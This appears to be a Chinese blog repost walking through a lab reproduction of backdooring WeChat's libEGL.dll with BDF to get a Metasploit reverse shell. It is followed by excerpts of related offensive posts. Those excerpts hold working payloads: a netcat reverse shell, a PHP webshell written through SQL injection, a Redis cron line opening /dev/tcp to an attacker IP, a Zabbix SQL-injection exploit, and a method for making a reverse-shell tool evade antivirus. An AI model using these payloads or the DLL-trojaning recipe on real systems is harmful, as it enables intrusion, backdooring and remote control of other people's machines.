微信劫持反弹shell复现

实验环境:win7、kali

实验工具:微信;BDF劫持工具,可用于DLL注入;Process Explorer任务管理工具,本实验中用于查找微信程序调用的DLL文件

在win7中安装微信BDF、Process Explore

在windows启动pe、微信

在pe中找到wechat

在view中找到dlls

记住微信的安装路径,查看微信的libEGL.dll文件

回到kali

执行nautilus ./打开窗口

将libEGL.dll放在该文件路径下

执行命令处理dll文件

查看backdoored

将处理后的dll文件通过ftp上传到window中

开启postgresql

启用msfconsole

使用exploit

设置payload

设置监听地址和端口,查看

在win7中打开微信,就能在kali中接受到反弹的shell

原文地址:https://www.cnblogs.com/shayanboy/p/11644960.html

时间: 10-09

微信劫持反弹shell复现的相关文章

Python 反弹shell后门用51CTO Blog绑定

前言:仅做交流,仅做交流. 除了51CTO当然也可以用其他的媒介啦,比如微博,微信等.这里就用51CTO吧 思路:存在这样的一个情况,我们在某台机器上放置一个木马~~~里面我们会写入自己服务端的IP,但是可能我们的IP会变,我们当然可以用域名解决这个问题,不过那样显得不是很优雅,而且域名要钱的啦~~~所以我们需要一个中间件! 在说说什么是反弹Shell,反弹shell的好处在于被攻击的主机可能限制了进口,即只允许某个端口的链接,其他链接都屏蔽,这个时候我们就需要被攻击的主机主动来连我们的服务器,

JS探测内网是否存在bash漏洞,反弹shell

来t00ls几天啦,也没时间写原创. --(本人首发土司啦.) 最近看到老外一篇文章,觉得很不错. 测试了一下把这个东西把过程分享给大伙,希望大伙不要踩,忙完这几天就写原创 调用一个js,扫描内网是否存在bash漏洞,然后反弹shell回来的一个小东西.搞APT应该用得到啦. 测试过程: 老外发的一个Poc我内网搭建测试 先监听了本地250端口 然后搭建之后访问 1 http://192.168.1.9/test.html?s=192.168.1.1&e3=1&e4=20&d=19

NC / Netcat - 反弹Shell

原理 实验环境: 攻击机:windows机器,IP:192.168.12.109 受害机:linux机器,IP:192.168.79.1 攻击机:设置本地监听端口2222 C:\netcat>nc -l -p 2222 受害机:反弹/bin/bash 到攻击机(192.168.12.109)的2222端口 [email protected]:~# nc 192.168.12.109 2222 -e /bin/bash 反弹shell成功后即可在windows的cmd.exe下执行Linux下的/

Python3实现——反弹shell

一.演示一下反弹shell的效果 0.看一下python版本 1.我们这边是服务端 客户端连接后就可以输入命令了,比如下面截图中输入的pwd 2.目标机是客户端,输入ip和端口 二.代码+注释 0.服务端 1.客户端

小白日记40:kali渗透测试之Web渗透-SQL手工注入(二)-读取文件、写入文件、反弹shell

SQL手工注入 1.读取文件[load_file函数] ' union  SELECT null,load_file('/etc/passwd')--+ burpsuite 2.写入文件 ' union select null,"<?php passthru($_GET['cmd']); ?>" INTO DUMPFILE "/var/www/a.php" --+   [写入一句话木马:INTO DUMPLING:MySQL函数,将输入下载在数据库中]

Redis未授权访问反弹shell

目标主机:10.104.11.178 攻击机:kali 攻击步骤: 1.与目标主机连接 [email protected]:~# /usr/redis/redis-cli -h 10.104.11.178 2.kali主机进行监听 nc -l -v -p 9999 3.写入反弹shell语句 set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/10.104.11.153/9999 0>&1\n\n" config

Zabbix sql注入漏洞脚本执行反弹shell

exp检测是否存在SQL注入漏洞[email protected]:~# python zabbix.py http://ip:9090/+------------------------------------------------------------+ Python Zabbix<3.0.4 SQL注入 Exploitsuccess+------------------------------------------------------------+Zabbix 存在SQL注入漏洞

redis未授权反弹shell

rt发现一处redis未授权,进行反弹shell.输入反弹命令:主机监听端口:反弹成功. 原文地址:https://blog.51cto.com/13539934/2395206

分享一个免杀的反弹shell工具(python脚本转换成exe)

有时候网站服务器上有杀毒软件,我们上传的nc.exe.lcx.exe等工具都被杀了,这时候就需要一款免杀的工具来反弹shell. 这篇博客主要是依据国外的一片文章翻译而来,根据国外大佬的教程将Python脚本转换成exe程序即可免杀. 参考链接:https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1 第1步:安装Python2.7和Py2exe 一定要安装32位的Python 2.7和32位的P